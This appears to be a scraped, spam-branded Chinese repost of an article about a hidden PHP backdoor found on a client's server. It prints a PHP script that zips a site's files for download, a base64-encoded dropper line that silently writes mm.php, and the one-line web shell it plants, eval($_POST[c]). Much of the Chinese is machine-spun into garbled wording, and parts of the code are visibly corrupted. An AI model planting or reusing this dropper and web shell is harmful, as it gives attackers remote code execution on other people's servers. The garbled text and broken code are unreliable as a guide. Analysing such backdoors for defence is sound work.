betway必威-betway必威官方网站
做最好的网站

PHP隐形一句话后门,PHP网站备份程序代码分享

明天一个客户的服务器频仍被写入:
mm.php
内容为:

 

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>网址先后备份</title>
</head>
<body>
<form name="myform" method="post" action="">
<?php
error_reporting(E_ALL & ~E_NOTICE);
ini_set('memory_limit', '2048M');
echo "选拔要减小的文本或目录:<br>";
$fdir = opendir('./');
while($file=readdir($fdir))
{
if($file=='.'|| $file=='..')
continue;
echo "<input name='dfile[]' type='checkbox' value='$file' ".($file==basename(__FILE__)?"":"checked")."> ";
if(is_file($file))
{
echo "<font face="wingdings" size="5">2</font>  $file<br>";
}
else
{
echo "<font face="wingdings" size="5">0</font> $file<br>";
}
}
?>
<br>
包括下列文件类型:
<input name="file_type" type="text" id="file_type" value="" size="50">
<font color="red">
(文件类型用"|"隔断,暗中同意空则带有自由文件,例:倘诺急需打包php和jpg文件,则输入"php|jpg")
</font>
<br>
压缩文件保存到目录:
<input name="todir" type="text" id="todir" value="__dwb2011__" size="15">
<font color="red">
(留空为本目录,必须有写入权限)
</font>
<br>
压缩文件名称:
<input name="zipname" type="text" id="zipname" value="dwb2011.zip" size="15">
<font color="red">
(.zip)
</font>
<br>
<br>
<input name="myaction" type="hidden" id="myaction" value="dozip">
<input type='button' value='反选' onclick='selrev();'>
<input type="submit" name="Submit" value=" 先导压缩 ">
<script language='javascript'>
function selrev()
{
with(document.myform)
{
for(i=0;i<elements.length;i )
{
thiselm = elements[i];
if(thiselm.name.match(/dfile[]/))
thiselm.checked = !thiselm.checked;
}
}
}
</script>
<?php
error_reporting(E_ALL & ~E_NOTICE);
set_time_limit(0);
class PHPzip
{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = ''; //该变量只被类外界程序访谈
var $gzfilename;
var $fp;
var $dirstr='';
var $filefilters = array();
function SetFileFilter($filetype)
{
$this->filefilters = explode('|',$filetype);
}
//重临文件的修改时间格式.
//只为本类内部函数调用.
function unix2DosTime($unixtime = 0)
{
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980)
{
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
//初步化文件,建立文件目录,
//并回到文件的写入权限.
function startfile($path = 'dodo.zip')
{
$this->gzfilename=$path;
$mypathdir=array();
do
{
$mypathdir[] = $path = dirname($path);
} while($path != '.');
@end($mypathdir);
do
{
$path = @current($mypathdir);
@mkdir($path);
} while(@prev($mypathdir));
if($this->fp=@fopen($this->gzfilename,"w"))
{
return true;
}
return false;
}
//增加三个文书到 zip 压缩包中.
function addfile($data, $name)
{
$name = str_replace('\', '/', $name);
if(strrchr($name,'/')=='/')
return $this->adddir($name);
if(!empty($this->filefilters))
{
if (!in_array(end(explode(".",$name)), $this->filefilters))
{
return;
}
}
$dtime = dechex($this->unix2DosTime());
$hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$c_len = strlen($zdata);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
//新增文件内容格式化:
$datastr = "x50x4bx03x04";
$datastr .= "x14x00"; // ver needed to extract
$datastr .= "x00x00"; // gen purpose bit flag
$datastr .= "x08x00"; // compression method
$datastr .= $hexdtime; // last mod time and date
$datastr .= pack('V', $crc); // crc32
$datastr .= pack('V', $c_len); // compressed filesize
$datastr .= pack('V', $unc_len); // uncompressed filesize
$datastr .= pack('v', strlen($name)); // length of filename
$datastr .= pack('v', 0); // extra field length
$datastr .= $name;
$datastr .= $zdata;
$datastr .= pack('V', $crc); // crc32
$datastr .= pack('V', $c_len); // compressed filesize
$datastr .= pack('V', $unc_len); // uncompressed filesize
fwrite($this->fp,$datastr); //写入新的公文内容
$my_datastr_len = strlen($datastr);
unset($datastr);
//新增文件目录音信
$dirstr = "x50x4bx01x02";
$dirstr .= "x00x00"; // version made by
$dirstr .= "x14x00"; // version needed to extract
$dirstr .= "x00x00"; // gen purpose bit flag
$dirstr .= "x08x00"; // compression method
$dirstr .= $hexdtime; // last mod time & date
$dirstr .= pack('V', $crc); // crc32
$dirstr .= pack('V', $c_len); // compressed filesize
$dirstr .= pack('V', $unc_len); // uncompressed filesize
$dirstr .= pack('v', strlen($name) ); // length of filename
$dirstr .= pack('v', 0 ); // extra field length
$dirstr .= pack('v', 0 ); // file comment length
$dirstr .= pack('v', 0 ); // disk number start
$dirstr .= pack('v', 0 ); // internal file attributes
$dirstr .= pack('V', 32 ); // external file attributes - 'archive' bit set
$dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
$dirstr .= $name;
$this->dirstr .= $dirstr; //目录新闻
$this -> file_count ;
$this -> dirstr_len = strlen($dirstr);
$this -> datastr_len = $my_datastr_len;
}
function adddir($name)
{
$name = str_replace("\", "/", $name);
$datastr = "x50x4bx03x04x0ax00x00x00x00x00x00x00x00x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this->fp,$datastr); //写入新的文本内容
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "x50x4bx01x02x00x00x0ax00x00x00x00x00x00x00x00x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name;
$this->dirstr .= $dirstr; //目录音信
$this -> file_count ;
$this -> dirstr_len = strlen($dirstr);
$this -> datastr_len = $my_datastr_len;
}
function createfile()
{
//压缩包停止新闻,包罗文件总量,目录音讯读取指针地点等新闻
$endstr = "x50x4bx05x06x00x00x00x00" .
pack('v', $this -> file_count) .
pack('v', $this -> file_count) .
pack('V', $this -> dirstr_len) .
pack('V', $this -> datastr_len) .
"x00x00";
fwrite($this->fp,$this->dirstr.$endstr);
fclose($this->fp);
}
}
if(!trim($_REQUEST[zipname]))
$_REQUEST[zipname] = "dodozip.zip";
else
$_REQUEST[zipname] = trim($_REQUEST[zipname]);
if(!strrchr(strtolower($_REQUEST[zipname]),'.')=='.zip')
$_REQUEST[zipname] .= ".zip";
$_REQUEST[todir] = str_replace('\','/',trim($_REQUEST[todir]));
if(!strrchr(strtolower($_REQUEST[todir]),'/')=='/')
$_REQUEST[todir] .= "/";
if($_REQUEST[todir]=="/")
$_REQUEST[todir] = "./";
function listfiles($dir=".")
{
global $dodozip;
$sub_file_num = 0;
if(is_file("$dir"))
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir"))
{
$dodozip -> addfile(implode('',file("$dir")),"$dir");
return 1;
}
return 0;
}
$handle=opendir("$dir");
while ($file = readdir($handle))
{
if($file=="."||$file=="..")
continue;
if(is_dir("$dir/$file"))
{
$sub_file_num = listfiles("$dir/$file");
}
else
{
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file"))
{
$dodozip -> addfile(implode('',file("$dir/$file")),"$dir/$file");
$sub_file_num ;
}
}
}
closedir($handle);
if(!$sub_file_num)
$dodozip -> addfile("","$dir/");
return $sub_file_num;
}
function num_bitunit($num)
{
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key<count($bitunit);$key )
{
if($num>=pow(2,10*$key)-1)
{ //1023B 会呈现为 1KB
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
}
}
return $num_bitunit_str;
}
if(is_array($_REQUEST[dfile]))
{
$dodozip = new PHPzip;
if($_REQUEST["file_type"] != NULL)
$dodozip -> SetFileFilter($_REQUEST["file_type"]);
if($dodozip -> startfile("$_REQUEST[todir]$_REQUEST[zipname]"))
{
echo "正在增进压缩文件...<br><br>";
$filenum = 0;
foreach($_REQUEST[dfile] as $file)
{
if(is_file($file))
{
if(!empty($dodozip -> filefilters))
if (!in_array(end(explode(".",$file)), $dodozip -> filefilters))
continue;
echo "<font face="wingdings" size="5">2</font>  $file<br>";
}
else
{
echo "<font face="wingdings" size="5">0</font> $file<br>";
}
$filenum = listfiles($file);
}
$dodozip -> createfile();
echo "<br>压缩达成,共增加 $filenum 个文件.<br><a href='$_REQUEST[todir]$_REQUEST[zipname]' _fcksavedurl='$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname] (".num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")).")</a>";
}
else
{
echo "$_REQUEST[todir]$_REQUEST[zipname] 不能写入,请检查路径或权限是或不是准确.<br>";
}
}
?>
</form>
</body>
</html>

复制代码 代码如下:

内容为:

复制代码 代码如下:

您大概感兴趣的稿子:

  • ThinkPHP中U方法的施用浅析
  • 改写ThinkPHP的U方法使其路由下分页平常
  • thinkPHP js文件中U方法不被深入分析难题的化解措施
  • ThinkPHP里用U方法调用js文件实例
  • thinkphp中U方法按路由准则生成url的主意
  • thinkphp微信开采(消息加密解密)
  • thinkphp微信开之安全方式音信加密解密不成功的化解办法
  • ThinkPHP达成的rsa非对称加密类示例
  • thinkPHP中U方法加密传递参数成效示例

base64_decode("bW0ucGhw")  //mm.php

效果图:
图片 1
PHP代码

终极查到某文件内的首先展现以下代码:

 

复制代码 代码如下:

 

如此,只要那么些文件被访问就能够自动创制 mm.php
万一您发觉了mm.php,删除了,以往还可能会再有的,真是越来越变态了~
下以连带内容

 

PD9ldmFs //base64_encode("<?eval");
ZXZhbA== //base64_encode("eval");

<?fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4="));?>

<?eval($_POST[c]);?>

<?eval($_POST[c]);?>

本文由betway必威发布于编程开发,转载请注明出处:PHP隐形一句话后门,PHP网站备份程序代码分享

TAG标签: betway必威
Ctrl+D 将本页面保存为书签,全面了解最新资讯,方便快捷。